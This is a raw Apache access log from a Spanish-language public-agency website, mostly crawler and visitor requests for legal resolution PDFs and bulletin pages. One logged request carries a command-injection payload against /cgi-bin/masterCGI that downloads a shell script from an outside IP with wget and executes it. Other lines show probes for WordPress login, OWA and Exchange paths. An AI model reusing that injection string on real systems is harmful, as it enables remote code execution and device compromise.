186.102.41.77 - - [03/Dec/2022:09:43:11 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+K8tai9pFC3Nl4KvfF20o32aZltpYf0EDnO7npr6a694Zc6nYyq4uetU61XarLUB8cj/KQ18ywdeokrCnUri1qWMPVQ3/TeWmocGkt6DpWQ4PLIHR00aM/hh2C934mMqINXq74r0DG0KxuKGwVr3zil1M+e711oKMc3w6AHCNXRxKJp+8Ql9pPl4D6BbwpEVy5nOKZA3nCvrtebJZYmcHdlaOw4okDZ/J82+vgsDfx0mVaUbUkrAvYdmHRVd2OpsCu3BfcTprU0XMzKyk26eJBD76AQw8Sfu3lJEZnZ9Ma1g1oV1oJaOg1xl1shGjB84Z5VUZPXRMxpLWVi82kTr87wtbI/YlDNiddbunlRmk7YOfWrW7bS97NDZCuTXHYy2aiIQ039bsMDd7a1yb1SRi14vvQT9ebnv4eUEHpGtzhAt+1Vy0WdssDjKLcVH3XktiuJwMkvFEiTnx6pXmqh7qZbj6ytOvT/OsKzQ5NbD5t8PIzoXHAAHFnlQVJlG9/K1XOI0gV0JMYxxL6ISA29/8F8/NOirym18eMChl7o8N/Nj9FZ7NNKUpOUcI8l9qHPj6h+xivTjpXBpZ1y46pOFS6iOmls3kxHGWg5osYbkx1byEjDh7i2TesXmb2umAAYoju2V53xwmmz8ci5NstMrEb6T56alZfE7KfeQ+wjtX6CTE+r/EBVf7K0S6vusnzSaL39Rpb/7TXCV6OuriH9zwSHaeV2HJ0d6EBGwh78OUlbLAEoDa3yHw/AIgDXYALQbAoAOciPzlXvRqTdxrTS9JlAIvKfIAzFHDLTAuSGNYrzjLJAkRtgmQxoPovDAsimGa9J/exkaBE9GlzSxXqSGKSSJdh8O1mDVYLwyRKjsgnPmFKDfnFbmPsY8JeHRqsjko1XrCDRU61cDsO2U7Jgxd9NRmmoYVsa0IOHC+Kv1MBHzS+9YbUnrxXXC25+XCvvzUu4N63md4vVQM9tiUyxJCf3lJCRtl/2FyY5Hb0M7SRckUuWbVMqV1igKssZSsR5FifKsAlMNaSd4RXvJZejoQAKsJWY035HViYyxQnaCVwIGHIW+BBvpoquB+Y2LXa3jfMdoi3hVic9rVrQEts1GlP/bb9eqHL9A4C2z9xip/l3vUYyMk3Z9OITuDy/tjwX93Xa/HcvDU8+bSzHDurGZfwurpuH423u6g+T3oUI1O4+HPrb+0oOe0nGwduk1tXWZ/UlAOPBJZ+RXqug3jA6Y9zsb0eKwHOgyG0b1Y++bsrNy6zuOWy9INjfLlMJJeTnvFlKHNNYiCO7wttRDl5X5zgn45mH7ScrkXmhS8pZKWBl7hQ0nQE/Zel9j01xv1ZohDcYux0jcrDvIMfZ7DUOmn/8BNn/qFcoQnv+fin1b3d48GPlJ6RZJHH8x7Gd4eBHQlICZiiTzrbguef7kqiR/FzuOq/mVOT5UysNDixJVXmSzKGSZj6ZUn/+ew6qDfZAHUu1PazrYLIYs+lOjq58b0p/BnyH+c4v83pn2N23oAUyDqYtbbxXChTpxGjkjWw6AI1cp3o+GF77XTPVKsbDi0rGgaSVSE17OtLaouDB7Co2i1BVfBbKQMdL0UZxbMmprhxlgaKl7i8auhHpH0/5YSeXOEwixfWSFZhedJa8evEH/KCZh8qHSSlOixKYzXYfSkjztK/RCvKs82GUTEZv8b+vARIxhTWae0mch+cEFiFeToHom/NUzXZc15hsuMuY52tGcnrMP39beTPFs9LDXazW64EQMp/a4L2aMj2kXGXBXbkeDwjY3booOkXmEdGa2VZ/UTTDomdPw6GoYpPCyMps57UUf95mdFm63n0rR8l/ZZH0QRHacEqx2Kcj4ZUB7GRZYfklU1IcQW4hgP+xNOriLnzVClX8SY=&u=U2FsdGVkX1+CApxPYoPB8v81AsBmPj6r0eVoqLfQ2tw=&y=U2FsdGVkX19CxFV1UJXq2E9Qnw/2asuoHzwwIw+i4E73pnN+2m7t6UZyIGHbwFJU HTTP/1.1" 200 26
186.102.41.77 - - [03/Dec/2022:09:43:11 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX188i4AF+k2vwKqQxV7JJ1nmLeL2mlnr+XscQdFpicakpMRlUT2RyPec/JAtgZHMMjUU7STJN9GR9pEOM5qped7fkhClZewGhMMQPnVDX1MWp0nE9CqHe4ICybHz6PP9qUCK/BJ5Z3SrmXDARF8Oo3Z3hTl4sj/MLN0=&u=U2FsdGVkX1+CApxPYoPB8v81AsBmPj6r0eVoqLfQ2tw=&y=U2FsdGVkX19CxFV1UJXq2E9Qnw/2asuoHzwwIw+i4E73pnN+2m7t6UZyIGHbwFJU HTTP/1.1" 200 26
186.102.41.77 - - [03/Dec/2022:09:43:11 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19+iP5B7GiPxPmlybRuPEfmQ0VRsXa5oYteqTS9psZrma5f3sTs/iLj0AUr7O0BGDm8U8ijp98xZkueiraN2eUmYpPymUfrVapLTLFSVMhTYc31XtI7foriAP22JSwhzgZockucpT0qDkOmPJfg8A5Tv4XL6VeoUBY=&u=U2FsdGVkX1+CApxPYoPB8v81AsBmPj6r0eVoqLfQ2tw=&y=U2FsdGVkX19CxFV1UJXq2E9Qnw/2asuoHzwwIw+i4E73pnN+2m7t6UZyIGHbwFJU HTTP/1.1" 200 26
186.102.41.77 - - [03/Dec/2022:09:43:11 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+b3/R3bJftLKKTdNahSJfnLWV3rX100Rlv0pkbVmahUyezKa2xER4y3zhJKg3iLbZA1Hj7H2DXrb+6TOsNNKJLeR8/90AdrLqL0bhUo3/fjHq70SWsXnRBV/Cv/A/M0XCZjCXYmnBbrfvs3U8FTjAumi/Oq6g3gCE=&u=U2FsdGVkX1+CApxPYoPB8v81AsBmPj6r0eVoqLfQ2tw=&y=U2FsdGVkX19CxFV1UJXq2E9Qnw/2asuoHzwwIw+i4E73pnN+2m7t6UZyIGHbwFJU HTTP/1.1" 200 26
186.102.41.77 - - [03/Dec/2022:09:43:12 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/wmpcINg9ZldCmUG9BLUmCGO61i2ZGZK3hLQ2zOfOytaenCu35SFD/9XaHlFhkPfmrI/qma2b3M0LC6A2t+KddS4Poppsd/CtaYQGgF1SGS0a/UujOJT+DKnTjwF9gS12/zjB99d8acKRWBCT9nkMHjTssBGE2SBgo9m0a3NmGCDFdWPhhD1k8Il1zBQmBx2B8AEU3qOYVhw==&u=U2FsdGVkX1+CApxPYoPB8v81AsBmPj6r0eVoqLfQ2tw=&y=U2FsdGVkX19CxFV1UJXq2E9Qnw/2asuoHzwwIw+i4E73pnN+2m7t6UZyIGHbwFJU HTTP/1.1" 200 26
172.22.2.4 - - [03/Dec/2022:09:42:04 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [03/Dec/2022:09:42:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52079
216.245.221.92 - - [03/Dec/2022:09:44:39 -0500] "HEAD / HTTP/1.1" 200 -
191.109.180.184 - - [03/Dec/2022:09:44:50 -0500] "GET /BLA/resoluciones/index.php HTTP/1.1" 200 13093
191.109.180.184 - - [03/Dec/2022:09:44:54 -0500] "GET /BLA/resoluciones/index.php HTTP/1.1" 200 13093
173.252.87.4 - - [03/Dec/2022:09:45:17 -0500] "GET /images/Acuerdos%2001%20(1)%20(1).jpeg HTTP/1.1" 200 32884
191.109.180.184 - - [03/Dec/2022:09:45:27 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
191.109.180.184 - - [03/Dec/2022:09:45:32 -0500] "GET /BLA/resoluciones/index.php HTTP/1.1" 200 13093
191.109.180.184 - - [03/Dec/2022:09:45:33 -0500] "GET /BLA/resoluciones/index.php HTTP/1.1" 200 13093
185.119.81.102 - - [03/Dec/2022:09:45:47 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.102 - - [03/Dec/2022:09:45:48 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3670
199.59.150.182 - - [03/Dec/2022:09:46:01 -0500] "GET /cumpleanos-de-entrenubes-nueva-aula-ambiental-y-manzana-de-cuidado-en-san-cristobal.html HTTP/1.1" 200 882
54.39.177.48 - - [03/Dec/2022:09:46:01 -0500] "GET /cumpleanos-de-entrenubes-nueva-aula-ambiental-y-manzana-de-cuidado-en-san-cristobal.html HTTP/1.1" 200 882
199.59.150.180 - - [03/Dec/2022:09:46:02 -0500] "GET /images/Entrenubes%201%20(1)%20(1).jpeg HTTP/1.1" 200 70096
217.182.175.162 - - [03/Dec/2022:09:46:04 -0500] "HEAD /cumpleanos-de-entrenubes-nueva-aula-ambiental-y-manzana-de-cuidado-en-san-cristobal.html HTTP/1.1" 200 -
51.210.36.36 - - [03/Dec/2022:09:46:04 -0500] "GET /cumpleanos-de-entrenubes-nueva-aula-ambiental-y-manzana-de-cuidado-en-san-cristobal.html HTTP/1.1" 200 882
207.46.13.174 - - [03/Dec/2022:09:46:15 -0500] "GET /BLA/resoluciones/00002105.tif HTTP/1.1" 404 1018
110.93.150.42 - - [03/Dec/2022:09:46:47 -0500] "GET /cumpleanos-de-entrenubes-nueva-aula-ambiental-y-manzana-de-cuidado-en-san-cristobal.html HTTP/1.1" 200 882
168.119.76.231 - - [03/Dec/2022:09:47:09 -0500] "GET /cumpleanos-de-entrenubes-nueva-aula-ambiental-y-manzana-de-cuidado-en-san-cristobal.html HTTP/1.1" 200 882
125.209.235.174 - - [03/Dec/2022:09:47:13 -0500] "GET /robots.txt HTTP/1.1" 404 1114
136.243.79.224 - - [03/Dec/2022:09:47:18 -0500] "GET /cumpleanos-de-entrenubes-nueva-aula-ambiental-y-manzana-de-cuidado-en-san-cristobal.html HTTP/1.1" 206 882
201.245.192.253 - - [03/Dec/2022:09:47:20 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
168.119.76.231 - - [03/Dec/2022:09:47:23 -0500] "GET /robots.txt HTTP/1.1" 404 1034
94.177.248.69 - - [03/Dec/2022:09:48:26 -0500] "GET /cumpleanos-de-entrenubes-nueva-aula-ambiental-y-manzana-de-cuidado-en-san-cristobal.html HTTP/1.1" 200 882
64.124.8.50 - - [03/Dec/2022:09:48:31 -0500] "GET /isolucionsda/ControlDeInicio.asp HTTP/1.1" 200 2478
173.252.79.22 - - [03/Dec/2022:09:48:53 -0500] "GET /images/mercados-campesinos-5-mayo.jpg HTTP/1.1" 200 95848
138.201.254.105 - - [03/Dec/2022:09:49:20 -0500] "HEAD /cumpleanos-de-entrenubes-nueva-aula-ambiental-y-manzana-de-cuidado-en-san-cristobal.html HTTP/1.1" 200 -
172.22.2.4 - - [03/Dec/2022:09:47:57 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [03/Dec/2022:09:49:39 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [03/Dec/2022:09:49:40 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9566
172.22.2.4 - - [03/Dec/2022:09:49:41 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
172.22.2.4 - - [03/Dec/2022:09:49:41 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
172.22.2.4 - - [03/Dec/2022:09:49:41 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
172.22.2.4 - - [03/Dec/2022:09:49:41 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
172.22.2.4 - - [03/Dec/2022:09:49:41 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
172.22.2.4 - - [03/Dec/2022:09:49:41 -0500] "GET /BLA/boletinlegal/js/ajax_actos.js HTTP/1.1" 200 1322
172.22.2.4 - - [03/Dec/2022:09:49:46 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
172.22.2.4 - - [03/Dec/2022:09:49:46 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
172.22.2.4 - - [03/Dec/2022:09:49:52 -0500] "GET /BLA/boletinlegal/images/green-yellow-blue-pink-th.png HTTP/1.1" 200 7394
172.22.2.4 - - [03/Dec/2022:09:49:52 -0500] "GET /BLA/boletinlegal/images/tel.png HTTP/1.1" 200 14477
172.22.2.4 - - [03/Dec/2022:09:49:54 -0500] "GET /BLA/boletinlegal/images/historia.png HTTP/1.1" 200 52775
172.22.2.4 - - [03/Dec/2022:09:49:54 -0500] "GET /BLA/boletinlegal/images/cabezote%20BLEGAL.jpg HTTP/1.1" 200 118164
172.22.2.4 - - [03/Dec/2022:09:49:54 -0500] "GET /BLA/boletinlegal/images/icono-email.png HTTP/1.1" 200 5544
172.22.2.4 - - [03/Dec/2022:09:49:54 -0500] "GET /BLA/boletinlegal/images/subscribe-icon-big.png HTTP/1.1" 200 47702
172.22.2.4 - - [03/Dec/2022:09:49:55 -0500] "GET /BLA/boletinlegal/images/body_bg.jpg HTTP/1.1" 200 1601
172.22.2.4 - - [03/Dec/2022:09:49:55 -0500] "GET /BLA/boletinlegal/images/registro-usuarios.png HTTP/1.1" 200 8106
172.22.2.4 - - [03/Dec/2022:09:50:03 -0500] "GET /BLA/boletinlegal/images/menu_lft.gif HTTP/1.1" 200 1713
172.22.2.4 - - [03/Dec/2022:09:50:05 -0500] "GET /BLA/boletinlegal/images/bg_top.jpg HTTP/1.1" 200 522
172.22.2.4 - - [03/Dec/2022:09:50:05 -0500] "GET /BLA/boletinlegal/images/menu_rght.gif HTTP/1.1" 200 1627
172.22.2.4 - - [03/Dec/2022:09:50:05 -0500] "GET /BLA/boletinlegal/images/menu_bg.jpg HTTP/1.1" 200 620
172.22.2.4 - - [03/Dec/2022:09:50:08 -0500] "GET /BLA/boletinlegal/images/hover.jpg HTTP/1.1" 200 640
172.22.2.4 - - [03/Dec/2022:09:50:08 -0500] "GET /BLA/boletinlegal/images/text.jpg HTTP/1.1" 200 568
172.22.2.4 - - [03/Dec/2022:09:50:08 -0500] "GET /BLA/boletinlegal/images/footer_bg.jpg HTTP/1.1" 200 586
157.55.39.39 - - [03/Dec/2022:09:50:25 -0500] "GET /galeria/galeria/fotos/16.jpg HTTP/1.1" 200 188294
172.22.2.4 - - [03/Dec/2022:09:48:47 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56825
172.22.2.4 - - [03/Dec/2022:09:51:28 -0500] "GET /BLA/boletinlegal/images/footer_bg_l.jpg HTTP/1.1" 200 776
172.22.2.4 - - [03/Dec/2022:09:51:28 -0500] "GET /BLA/boletinlegal/img/0.png HTTP/1.1" 200 110
172.22.2.4 - - [03/Dec/2022:09:51:28 -0500] "GET /BLA/boletinlegal/img/select-left.png HTTP/1.1" 200 263
172.22.2.4 - - [03/Dec/2022:09:51:29 -0500] "GET /BLA/boletinlegal/img/select-right.png HTTP/1.1" 200 44019
172.22.2.4 - - [03/Dec/2022:09:51:29 -0500] "GET /BLA/boletinlegal/img/button-left.png HTTP/1.1" 200 57071
172.22.2.4 - - [03/Dec/2022:09:51:29 -0500] "GET /BLA/boletinlegal/img/button.png HTTP/1.1" 200 43241
172.22.2.4 - - [03/Dec/2022:09:51:29 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
172.22.2.4 - - [03/Dec/2022:09:51:29 -0500] "GET /BLA/boletinlegal/img/button-right.png HTTP/1.1" 200 57878
172.22.2.4 - - [03/Dec/2022:09:51:31 -0500] "GET /BLA/boletinlegal/jurisprudencia.php HTTP/1.1" 200 17573
172.22.2.4 - - [03/Dec/2022:09:51:31 -0500] "GET /BLA/boletinlegal/images/sub_ul_li.gif HTTP/1.1" 200 343
172.22.2.4 - - [03/Dec/2022:09:51:31 -0500] "GET /BLA/boletinlegal/images/jurisprudencia.png HTTP/1.1" 200 66721
172.22.2.4 - - [03/Dec/2022:09:51:38 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9566
201.245.192.253 - - [03/Dec/2022:09:52:19 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [03/Dec/2022:09:52:29 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=PEV&fecha=2020&resuelve=RECURSO HTTP/1.1" 200 280444
172.22.2.4 - - [03/Dec/2022:09:52:29 -0500] "GET /BLA/boletinlegal/images/pdf.gif HTTP/1.1" 200 567
172.22.2.4 - - [03/Dec/2022:09:52:29 -0500] "GET /BLA/boletinlegal/images/background.gif HTTP/1.1" 200 -
193.47.61.60 - - [03/Dec/2022:09:52:34 -0500] "GET / HTTP/1.1" 200 319
193.47.61.60 - - [03/Dec/2022:09:52:38 -0500] "GET /cgi-bin/masterCGI?ping=nomip&user=;cd${IFS}/tmp;wget${IFS}http://185.132.53.105/f/strs.sh${IFS}-O-${IFS}>sfs;chmod${IFS}777${IFS}sfs;sh${IFS}sfs${IFS}Alcatel; HTTP/1.1" 404 1018
162.55.170.174 - - [03/Dec/2022:09:52:55 -0500] "GET / HTTP/1.1" 200 319
191.109.180.184 - - [03/Dec/2022:09:54:23 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202020/2383.pdf HTTP/1.1" 200 3790521
216.245.221.92 - - [03/Dec/2022:09:54:39 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [03/Dec/2022:09:53:47 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [03/Dec/2022:09:54:37 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58612
66.220.149.24 - - [03/Dec/2022:09:57:09 -0500] "GET /images/cr\xc3\xb3nica-29-nov-1_optimized.jpeg HTTP/1.1" 404 1034
201.245.192.253 - - [03/Dec/2022:09:57:18 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
114.119.148.50 - - [03/Dec/2022:09:57:56 -0500] "GET /BLA/resoluciones/AUTOS%202016/2851.pdf HTTP/1.1" 200 383889
173.214.175.178 - - [03/Dec/2022:09:57:57 -0500] "CONNECT cloudflare.com:443 HTTP/1.1" 405 942
213.186.1.246 - - [03/Dec/2022:09:58:44 -0500] "GET /robots.txt HTTP/1.1" 404 1034
216.245.221.92 - - [03/Dec/2022:09:59:39 -0500] "HEAD / HTTP/1.1" 200 -
213.186.1.248 - - [03/Dec/2022:10:00:11 -0500] "GET /cumpleanos-de-entrenubes-nueva-aula-ambiental-y-manzana-de-cuidado-en-san-cristobal.html HTTP/1.1" 200 882
172.22.2.4 - - [03/Dec/2022:09:59:37 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.66.85 - - [03/Dec/2022:10:01:56 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202021/3311.pdf HTTP/1.1" 200 394788
172.22.2.4 - - [03/Dec/2022:10:00:27 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57824
201.245.192.253 - - [03/Dec/2022:10:02:17 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
66.249.66.86 - - [03/Dec/2022:10:02:24 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/2654.pdf HTTP/1.1" 200 1069760
66.249.66.85 - - [03/Dec/2022:10:02:25 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/6843.pdf HTTP/1.1" 200 364426
66.249.66.86 - - [03/Dec/2022:10:02:31 -0500] "GET /BLA/resoluciones/AUTOS%202018/3246.pdf HTTP/1.1" 200 235020
66.249.66.86 - - [03/Dec/2022:10:02:37 -0500] "GET /BLA/resoluciones/AUTOS%202014/3659.pdf HTTP/1.1" 200 763986
190.69.224.152 - - [03/Dec/2022:10:02:40 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
190.69.224.152 - - [03/Dec/2022:10:02:40 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
190.69.224.152 - - [03/Dec/2022:10:02:40 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
66.249.66.86 - - [03/Dec/2022:10:02:44 -0500] "GET /BLA/resoluciones/AUTOS%202014/4314.pdf HTTP/1.1" 200 551109
66.249.66.86 - - [03/Dec/2022:10:02:50 -0500] "GET /BLA/resoluciones/AUTOS%202013/1355.pdf HTTP/1.1" 200 162195
66.249.66.86 - - [03/Dec/2022:10:02:56 -0500] "GET /BLA/resoluciones/AUTOS%202014/3296.pdf HTTP/1.1" 200 172508
66.249.66.85 - - [03/Dec/2022:10:03:03 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/0056.pdf HTTP/1.1" 200 363108
66.249.66.87 - - [03/Dec/2022:10:03:09 -0500] "GET /BLA/resoluciones/AUTOS%202010/6649.pdf HTTP/1.1" 200 156049
66.249.66.85 - - [03/Dec/2022:10:03:15 -0500] "GET /Publicaciones/2020EE164505.pdf HTTP/1.1" 404 228
66.249.66.85 - - [03/Dec/2022:10:03:21 -0500] "GET /BLA/resoluciones/AUTOS%202014/0467.pdf HTTP/1.1" 200 422328
66.249.66.85 - - [03/Dec/2022:10:03:27 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%202401%20AL%202500/RESOLUCION%202410%20DE%202007.pdf HTTP/1.1" 200 396489
66.249.66.85 - - [03/Dec/2022:10:03:33 -0500] "GET /transparencia/financiera/Ejecucion%20Presupuestal/Historico/EJECUCION%20%20VIGENCIA%20DICIEMBRE%202009.pdf HTTP/1.1" 404 1018
66.249.66.85 - - [03/Dec/2022:10:03:39 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/7748.pdf HTTP/1.1" 200 506842
66.249.66.85 - - [03/Dec/2022:10:03:45 -0500] "GET /BLA/resoluciones/AUTOS%202015/7179.pdf HTTP/1.1" 200 576214
66.249.66.85 - - [03/Dec/2022:10:03:51 -0500] "GET /Publicaciones/2022EE282954.pdf HTTP/1.1" 404 228
66.249.66.86 - - [03/Dec/2022:10:03:57 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/1355.pdf HTTP/1.1" 200 634181
66.249.66.86 - - [03/Dec/2022:10:04:02 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202022/2341.pdf HTTP/1.1" 200 365250
66.249.66.85 - - [03/Dec/2022:10:04:09 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/0014.pdf HTTP/1.1" 200 721354
66.249.66.85 - - [03/Dec/2022:10:04:14 -0500] "GET /BLA/resoluciones/AUTOS%202013/1849.pdf HTTP/1.1" 200 410703
66.249.66.85 - - [03/Dec/2022:10:04:20 -0500] "GET /BLA/resoluciones/AUTOS%202014/5574.pdf HTTP/1.1" 200 397176
172.22.2.4 - - [03/Dec/2022:10:04:21 -0500] "GET /BLA/boletinlegal/images/nuevo.gif HTTP/1.1" 200 26475
207.46.13.174 - - [03/Dec/2022:10:04:46 -0500] "GET /BLA/boletinlegal/norma_menu.php HTTP/1.1" 200 6318
216.245.221.92 - - [03/Dec/2022:10:04:48 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.85 - - [03/Dec/2022:10:05:23 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/RESOLUCION%206455%20DE%202010.PDF HTTP/1.1" 200 27568
66.249.66.85 - - [03/Dec/2022:10:05:27 -0500] "GET /BLA/resoluciones/AUTOS%202014/5790.pdf HTTP/1.1" 200 209080
66.249.66.85 - - [03/Dec/2022:10:05:54 -0500] "GET /BLA/resoluciones/AUTOS%202017/3031.pdf HTTP/1.1" 200 322948
114.119.153.214 - - [03/Dec/2022:10:06:41 -0500] "GET /BLA/resoluciones/AUTOS%202016/1830.pdf HTTP/1.1" 200 472947
172.22.2.4 - - [03/Dec/2022:10:05:27 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [03/Dec/2022:10:07:16 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
66.249.66.87 - - [03/Dec/2022:10:07:19 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202021/3352.pdf HTTP/1.1" 200 360131
172.22.2.4 - - [03/Dec/2022:10:06:17 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57192
66.249.66.85 - - [03/Dec/2022:10:08:00 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202021/4147.pdf HTTP/1.1" 200 402177
66.249.66.85 - - [03/Dec/2022:10:08:07 -0500] "GET /BLA/resoluciones/AUTOS%202015/3926.pdf HTTP/1.1" 200 568365
66.249.66.85 - - [03/Dec/2022:10:08:10 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202021/3339.pdf HTTP/1.1" 200 350985
66.249.66.85 - - [03/Dec/2022:10:08:18 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202021/4794.pdf HTTP/1.1" 200 335291
66.249.66.85 - - [03/Dec/2022:10:08:28 -0500] "GET /BLA/resoluciones/Notificaciones/REGISTROS%202019/2313.pdf HTTP/1.1" 200 265446
114.119.131.90 - - [03/Dec/2022:10:08:28 -0500] "GET /BLA/resoluciones/AUTOS%202015/7299.pdf HTTP/1.1" 200 585920
114.119.132.68 - - [03/Dec/2022:10:08:52 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%2B1996/&sort=size&order=asc HTTP/1.1" 200 13300
45.79.181.94 - - [03/Dec/2022:10:08:53 -0500] "\x16\x03\x01" 400 226
66.249.66.86 - - [03/Dec/2022:10:08:56 -0500] "GET /BLA/resoluciones/Notificaciones/REGISTROS%202019/2296.pdf HTTP/1.1" 200 263136
66.249.66.85 - - [03/Dec/2022:10:08:58 -0500] "GET /BLA/resoluciones/AUTOS%202014/5985.pdf HTTP/1.1" 200 740234
66.249.66.85 - - [03/Dec/2022:10:09:02 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202021/4795.pdf HTTP/1.1" 200 332192
66.249.66.85 - - [03/Dec/2022:10:09:19 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202021/4150.pdf HTTP/1.1" 200 352508
66.249.66.85 - - [03/Dec/2022:10:09:26 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202021/3330.pdf HTTP/1.1" 200 357055
216.245.221.92 - - [03/Dec/2022:10:09:39 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [03/Dec/2022:10:08:23 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 62423
66.249.66.85 - - [03/Dec/2022:10:10:05 -0500] "GET /BLA/resoluciones/AUTOS%202018/1280.pdf HTTP/1.1" 200 694937
172.22.2.4 - - [03/Dec/2022:10:10:12 -0500] "GET /BLA/boletinlegal/owa/auth/logon.aspx HTTP/1.1" 404 1018
66.249.66.85 - - [03/Dec/2022:10:10:53 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/2815.pdf HTTP/1.1" 200 2883275
40.77.167.13 - - [03/Dec/2022:10:11:01 -0500] "GET /Autoliquidacion/index.php?dir=Permiso+de+ocupaci%F3n+de+cauce%2F HTTP/1.1" 200 2434
173.252.87.20 - - [03/Dec/2022:10:11:50 -0500] "GET /images/cr\xc3\xb3nica-29-nov-1_optimized.jpeg HTTP/1.1" 404 1034
201.245.192.253 - - [03/Dec/2022:10:12:15 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [03/Dec/2022:10:11:17 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [03/Dec/2022:10:12:07 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55680
172.22.2.4 - - [03/Dec/2022:10:14:33 -0500] "GET /BLA/boletinlegal/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 404 1018
216.245.221.92 - - [03/Dec/2022:10:14:39 -0500] "HEAD / HTTP/1.1" 200 -
191.109.180.184 - - [03/Dec/2022:10:15:09 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202020/2183.pdf HTTP/1.1" 200 1069808
114.119.130.221 - - [03/Dec/2022:10:15:49 -0500] "GET /BLA/resoluciones/index.php?dir=Notificaciones/RESOLUCIONES%2B2013/&sort=name&order=asc HTTP/1.1" 200 13362
191.109.180.184 - - [03/Dec/2022:10:16:02 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202020/2181.pdf HTTP/1.1" 200 364319
45.57.224.199 - - [03/Dec/2022:10:16:20 -0500] "GET /cumpleanos-de-entrenubes-nueva-aula-ambiental-y-manzana-de-cuidado-en-san-cristobal.html HTTP/1.1" 200 882
66.249.66.85 - - [03/Dec/2022:10:16:32 -0500] "GET /robots.txt HTTP/1.1" 404 1018
157.55.39.39 - - [03/Dec/2022:10:16:36 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2018%2F HTTP/1.1" 200 442469
201.245.192.253 - - [03/Dec/2022:10:17:15 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
191.109.180.184 - - [03/Dec/2022:10:17:17 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202020/2182.pdf HTTP/1.1" 200 362516
66.249.66.87 - - [03/Dec/2022:10:17:20 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202021/3441.pdf HTTP/1.1" 200 353533
172.22.2.4 - - [03/Dec/2022:10:17:07 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.66.86 - - [03/Dec/2022:10:19:02 -0500] "GET /BLA/resoluciones/AUTOS%202018/3035.pdf HTTP/1.1" 200 2305820
